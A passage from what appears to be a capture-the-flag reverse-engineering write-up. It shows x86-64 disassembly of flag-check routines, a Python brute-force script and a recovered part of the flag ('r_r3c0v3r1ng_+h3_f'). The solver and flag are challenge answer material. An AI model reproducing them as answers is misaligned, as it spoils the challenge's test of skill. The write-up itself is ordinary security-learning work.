 1e4:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 1eb:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> c0 <span class="hljs-number">02</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x2</span>
 1ef:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 1f2:   c0 e8 <span class="hljs-number">06</span>                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">al</span>,<span class="hljs-number">0x6</span>
 1f5:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 1f8:   <span class="hljs-number">09</span> d0                   <span class="hljs-keyword">or</span>     <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 1fa:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 1fc:   0f b6 4c <span class="hljs-number">05</span> b0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x50</span>]
 <span class="hljs-number">201</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>]
 <span class="hljs-number">208</span>:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">50</span> <span class="hljs-number">01</span>             <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rdx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x1</span>]
 20c:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">95</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>],<span class="hljs-built_in">rdx</span>
 <span class="hljs-number">213</span>:   <span class="hljs-number">89</span> ca                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">215</span>:   <span class="hljs-number">88</span> <span class="hljs-number">10</span>                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>],<span class="hljs-built_in">dl</span>
 <span class="hljs-number">217</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 21e:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> c0 <span class="hljs-number">02</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x2</span>
 <span class="hljs-number">222</span>:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 <span class="hljs-number">225</span>:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 <span class="hljs-number">228</span>:   <span class="hljs-number">83</span> e0 3f                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x3f</span>
 22b:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">22d</span>:   0f b6 4c <span class="hljs-number">05</span> b0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x50</span>]
 <span class="hljs-number">232</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>]
 <span class="hljs-number">239</span>:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">50</span> <span class="hljs-number">01</span>             <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rdx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x1</span>]
 <span class="hljs-number">23d</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">95</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>],<span class="hljs-built_in">rdx</span>
 <span class="hljs-number">244</span>:   <span class="hljs-number">89</span> ca                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">246</span>:   <span class="hljs-number">88</span> <span class="hljs-number">10</span>                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>],<span class="hljs-built_in">dl</span>
 <span class="hljs-number">248</span>:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>],<span class="hljs-number">0x3</span>
 24f:   <span class="hljs-number">03</span> 
 <span class="hljs-number">250</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">95</span> <span class="hljs-number">48</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xb8</span>]
 <span class="hljs-number">257</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 25e:   <span class="hljs-number">48</span> <span class="hljs-number">29</span> c2                <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">rax</span>
 <span class="hljs-number">261</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> d0                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
 <span class="hljs-number">264</span>:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> f8 <span class="hljs-number">02</span>             <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x2</span>
 <span class="hljs-number">268</span>:   0f 8f e8 fe ff ff       <span class="hljs-keyword">jg</span>     <span class="hljs-number">0x156</span>
 26e:   c7 <span class="hljs-number">85</span> <span class="hljs-number">34</span> ff ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xcc</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">275</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">278</span>:   c7 <span class="hljs-number">85</span> <span class="hljs-number">34</span> ff ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xcc</span>],<span class="hljs-number">0x0</span>
 27f:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">282</span>:   eb 3b                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x2bf</span>
 <span class="hljs-number">284</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">34</span> ff ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xcc</span>]
 28a:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 28c:   0f b6 <span class="hljs-number">84</span> <span class="hljs-number">05</span> <span class="hljs-number">70</span> ff ff    <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x90</span>]
 <span class="hljs-number">293</span>:   ff 
 <span class="hljs-number">294</span>:   0f b6 d0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">al</span>
 <span class="hljs-number">297</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">34</span> ff ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xcc</span>]
 <span class="hljs-number">29d</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 29f:   0f b6 <span class="hljs-number">84</span> <span class="hljs-number">05</span> <span class="hljs-number">50</span> ff ff    <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0xb0</span>]
 2a6:   ff 
 2a7:   0f be c0                <span class="hljs-keyword">movsx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 2aa:   <span class="hljs-number">39</span> c2                   <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 2ac:   <span class="hljs-number">74</span> 0a                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x2b8</span>
 2ae:   c7 <span class="hljs-number">85</span> <span class="hljs-number">30</span> ff ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xd0</span>],<span class="hljs-number">0x0</span>
 2b5:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 2b8:   <span class="hljs-number">83</span> <span class="hljs-number">85</span> <span class="hljs-number">34</span> ff ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xcc</span>],<span class="hljs-number">0x1</span>
 2bf:   <span class="hljs-number">83</span> bd <span class="hljs-number">34</span> ff ff ff <span class="hljs-number">17</span>    <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xcc</span>],<span class="hljs-number">0x17</span>
 2c6:   7e bc                   <span class="hljs-keyword">jle</span>    <span class="hljs-number">0x284</span>
 2c8:   8b <span class="hljs-number">85</span> <span class="hljs-number">30</span> ff ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xd0</span>]
 2ce:   <span class="hljs-number">48</span> 8b <span class="hljs-number">75</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>]
 2d2:   <span class="hljs-number">64</span> <span class="hljs-number">48</span> <span class="hljs-number">33</span> <span class="hljs-number">34</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
 2d9:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 2<span class="hljs-built_in">db</span>:   <span class="hljs-number">74</span> <span class="hljs-number">05</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x2e2</span>
 2<span class="hljs-built_in">dd</span>:   e8 <span class="hljs-number">19</span> f8 ff ff          <span class="hljs-keyword">call</span>   <span class="hljs-number">0xfffffffffffffafb</span>
 2e2:   c9                      <span class="hljs-keyword">leave</span>  
 2e3:   c3                      <span class="hljs-keyword">ret</span>
</code></pre><p>I didn&#39;t figure out what exactly the check3 function is. I just translate it to python script and brute force the third part of flag which is <code>r_r3c0v3r1ng_+h3_f</code></p>
<pre class="hljs"><code>from pwn import *
import <span class="hljs-built_in">string</span>

cipher=p64(0x23415f4125516034)+p64(0x7d482f41255a3a54)+p64(0xb515b41536d257b)

a=[
0x32716e66492d7c2a
,0x24645a410a202130
,0x7b2f445c6f583c72
,0x377a5434617e434b
,0x7d0b60783a5e5929
,0x76696d4f79317353
,0x4e5f5b405d250d23
,0x677551562c6a4828
]
<span class="hljs-keyword">table</span>=<span class="hljs-string">""</span>.join(map(p64,a))

def findpossible_one(cpos):
  <span class="hljs-keyword">ret</span>=[]
  <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> string.printable:
    a=ord(i)
    a&gt;&gt;=2
    <span class="hljs-keyword">cc</span>=<span class="hljs-keyword">table</span>[a]
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">cc</span> == cipher[cpos]:
      #<span class="hljs-keyword">print</span> <span class="hljs-built_in">i</span>
      <span class="hljs-keyword">ret</span>.<span class="hljs-keyword">append</span>(i)
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">ret</span>

def findpossible_two(first,cpos):
  <span class="hljs-keyword">ret</span>=[]
  <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> string.printable:
    a=ord(i)
    a&gt;&gt;=4
    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> first:
      c=ord(j)
      c&lt;&lt;=4
      c&amp;=0x30
      c|=a
      <span class="hljs-keyword">cc</span>=<span class="hljs-keyword">table</span>[c]
      <span class="hljs-keyword">if</span> <span class="hljs-keyword">cc</span> == cipher[cpos]:
        #<span class="hljs-keyword">print</span> <span class="hljs-built_in">i</span>
        <span class="hljs-keyword">ret</span>.<span class="hljs-keyword">append</span>([j,i])
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">ret</span> 
def findpossible_three(<span class="hljs-keyword">two</span>,cpos):
  <span class="hljs-keyword">ret</span>=[]
  <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> string.printable:
    a=ord(i)
    a&gt;&gt;=6
    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-keyword">two</span>:
      c=ord(j[1])
      c&lt;&lt;=2
      c&amp;=0x3c
      c|=a
      <span class="hljs-keyword">cc</span>=<span class="hljs-keyword">table</span>[c]
      <span class="hljs-keyword">if</span> <span class="hljs-keyword">cc</span> == cipher[cpos]:
        #<span class="hljs-keyword">print</span> <span class="hljs-built_in">i</span>
        <span class="hljs-keyword">ret</span>.<span class="hljs-keyword">append</span>(j+[i])
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">ret</span> 

def findpossible_last(three,cpos):
  <span class="hljs-keyword">ret</span>=[]
  <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> three:
      c=ord(j[2])
      c&amp;=0x3f
      <span class="hljs-keyword">cc</span>=<span class="hljs-keyword">table</span>[c]
      <span class="hljs-keyword">if</span> <span class="hljs-keyword">cc</span> == cipher[cpos]:
        #<span class="hljs-keyword">print</span> <span class="hljs-built_in">i</span>
        <span class="hljs-keyword">ret</span>.<span class="hljs-keyword">append</span>(j)
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">ret</span> 
flag=<span class="hljs-string">""</span>
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-keyword">range</span>(0,len(cipher),4):
  first = findpossible_one(i)
  <span class="hljs-keyword">print</span> first
  <span class="hljs-keyword">two</span>=findpossible_two(first,i+1)
  <span class="hljs-keyword">print</span> <span class="hljs-keyword">two</span>
  three=findpossible_three(<span class="hljs-keyword">two</span>,i+2)
  <span class="hljs-keyword">print</span> three
  last=findpossible_last(three,i+3)
  <span class="hljs-keyword">if</span> len(last) !=1:
    <span class="hljs-keyword">print</span> <span class="hljs-string">"error"</span>
    <span class="hljs-keyword">exit</span>()
  flag+=<span class="hljs-string">""</span>.join(last[0])
  <span class="hljs-keyword">print</span> flag

</code></pre><pre class="hljs"><code><span class="hljs-symbol">check4:</span>
   <span class="hljs-number">0</span>:   <span class="hljs-number">55</span>                      <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbp</span>
   <span class="hljs-number">1</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> e5                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbp</span>,<span class="hljs-built_in">rsp</span>
   <span class="hljs-number">4</span>:   <span class="hljs-number">48</span> <span class="hljs-number">81</span> ec a0 <span class="hljs-number">04</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">rsp</span>,<span class="hljs-number">0x4a0</span>
<span class="hljs-symbol">   b:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> bd <span class="hljs-number">68</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x498</span>],<span class="hljs-built_in">rdi</span>
  <span class="hljs-number">12</span>:   <span class="hljs-number">89</span> b5 <span class="hljs-number">64</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x49c</span>],<span class="hljs-built_in">esi</span>
  <span class="hljs-number">18</span>:   <span class="hljs-number">64</span> <span class="hljs-number">48</span> 8b <span class="hljs-number">04</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
  1f:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
  <span class="hljs-number">21</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>],<span class="hljs-built_in">rax</span>
  <span class="hljs-number">25</span>:   <span class="hljs-number">31</span> c0                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
  <span class="hljs-number">27</span>:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">95</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rdx</span>,[<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x470</span>]
  2e:   b8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x0</span>
  <span class="hljs-number">33</span>:   b9 <span class="hljs-number">7d</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-number">0x7d</span>
  <span class="hljs-number">38</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> d7                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rdi</span>,<span class="hljs-built_in">rdx</span>
  3b:   f3 <span class="hljs-number">48</span> ab                <span class="hljs-keyword">rep</span> stos <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">es</span>:[<span class="hljs-built_in">rdi</span>],<span class="hljs-built_in">rax</span>
  3e:   <span class="hljs-number">48</span> b8 <span class="hljs-number">50</span> 6c <span class="hljs-number">33</span> <span class="hljs-number">61</span> <span class="hljs-number">73</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x30645f7361336c50</span>
  <span class="hljs-number">45</span>:   5f <span class="hljs-number">64</span> <span class="hljs-number">30</span> 
  <span class="hljs-number">48</span>:   <span class="hljs-number">48</span> ba 6e <span class="hljs-number">27</span> <span class="hljs-number">74</span> 5f <span class="hljs-number">63</span>    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x353452635f74276e</span>
  4f:   <span class="hljs-number">52</span> <span class="hljs-number">34</span> <span class="hljs-number">35</span> 
  <span class="hljs-number">52</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> <span class="hljs-number">90</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x70</span>],<span class="hljs-built_in">rax</span>
  <span class="hljs-number">56</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">55</span> <span class="hljs-number">98</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x68</span>],<span class="hljs-built_in">rdx</span>
  5a:   <span class="hljs-number">48</span> b8 <span class="hljs-number">68</span> 5f <span class="hljs-number">31</span> 6e 5f    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x21682b5f6e315f68</span>
  <span class="hljs-number">61</span>:   2b <span class="hljs-number">68</span> <span class="hljs-number">21</span> 
  <span class="hljs-number">64</span>:   <span class="hljs-number">48</span> ba <span class="hljs-number">73</span> 5f <span class="hljs-number">66</span> <span class="hljs-number">55</span> 6e    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x312b436e55665f73</span>
  6b:   <span class="hljs-number">43</span> 2b <span class="hljs-number">31</span> 
  6e:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> a0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x60</span>],<span class="hljs-built_in">rax</span>
  <span class="hljs-number">72</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">55</span> a8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>],<span class="hljs-built_in">rdx</span>
  <span class="hljs-number">76</span>:   <span class="hljs-number">66</span> c7 <span class="hljs-number">45</span> b0 <span class="hljs-number">30</span> 6e       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">WORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x50</span>],<span class="hljs-number">0x6e30</span>
  7c:   c6 <span class="hljs-number">45</span> b2 <span class="hljs-number">00</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4e</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">80</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> c0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x40</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">87</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">88</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> c8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x38</span>],<span class="hljs-number">0x0</span>
  8f:   <span class="hljs-number">00</span> 
  <span class="hljs-number">90</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> d0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x30</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">97</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">98</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> d8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>],<span class="hljs-number">0x0</span>
  9f:   <span class="hljs-number">00</span> 
<span class="hljs-symbol">  a0:</span>   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> e0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x20</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  a7:</span>   <span class="hljs-number">00</span> 
<span class="hljs-symbol">  a8:</span>   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> e8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  af:</span>   <span class="hljs-number">00</span> 
<span class="hljs-symbol">  b0:</span>   <span class="hljs-number">66</span> c7 <span class="hljs-number">45</span> f0 <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">WORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  b6:</span>   <span class="hljs-number">48</span> b8 2b <span class="hljs-number">55</span> <span class="hljs-number">5d</span> <span class="hljs-number">93</span> a0    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x14dd43a0935d552b</span>
<span class="hljs-symbol">  bd:</span>   <span class="hljs-number">43</span> <span class="hljs-built_in">dd</span> <span class="hljs-number">14</span> 
<span class="hljs-symbol">  c0:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> <span class="hljs-number">83</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x7d</span>],<span class="hljs-built_in">rax</span>
